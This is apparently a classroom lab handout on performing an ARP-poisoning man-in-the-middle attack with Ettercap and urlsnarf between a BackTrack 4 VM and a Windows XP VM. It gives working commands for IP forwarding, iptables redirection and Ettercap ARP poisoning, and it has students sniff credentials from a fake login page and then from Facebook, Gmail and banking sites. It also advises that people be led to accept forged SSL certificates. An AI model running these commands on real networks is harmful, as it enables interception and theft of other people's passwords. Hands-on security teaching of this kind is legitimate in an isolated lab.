
Ettercap Lab

Start the BackTrack 4 VM machine


Start the Windows XP VM machine

XP VM Setup

Your XP VM should be set to obtain its IP address dynamically, and the same for the DNS settings.

Next open a command prompt in XP and type: ipconfig /flushdns

BackTrack 4 Setup

Open a Terminal and type: dhclient3 eth0, press Enter, then type: echo 1 > /proc/sys/net/ipv4/ip_forward

then type cat /proc/sys/net/ipv4/ip_forward

You should see a 1 in the terminal; this enables packets to be forwarded through the attacking
machine.

At the Terminal type: kate /etc/etter.conf

Remove the # from the highlighted lines in the file, shown below

#---------------
# Linux
#---------------

# if you use ipchains:


#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:


#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Save and close the file and proceed.

ARP Poisoning

On the XP VM, type ipconfig at the command line and record the IP address; this will be the target
address.

Then in the BT4 Terminal type: ettercap -Tq -d -i eth0 -M arp: /IP of Target/ //

Explanation
-T text mode
-q quiet mode
-d password parsing
-i network interface
-M Man in the Middle
-arp ARP poisoning
// // all hosts on the LAN (This is very dangerous on a large LAN and could bring down the LAN, but
this would be cool to do and run Wireshark to see all the fake ARP requests)

Then open an additional Terminal in BT4 and type: urlsnarf -i eth0. This will allow you to see all
http(s) traffic.

Next go to your XP VM, open the browser and type: http://tinyurl.com/fakelogin
At this page enter any user name and password and press submit.

Now go to your BT4 terminal and at the bottom you should see the user name and password you
entered. Ettercap is able to sniff your credentials out of the packets.

Now go to Facebook.com or Gmail.com and try it; don't use your real user name and password,
Tony. The trick is to get the user to accept the fake SSL certificate; most people do, so you should
too. Did you see the SSL certificate pop up asking for your acceptance? You should then see the
user name and password and IP addresses in the ettercap terminal. Go and try some other sites
and see what you can grab, FTP2net, email, banking, etc…

Record your Ettercap Terminal Output, showing the passwords captured and the
URLSNARF traffic.

Press q to stop the ARP poisoning.
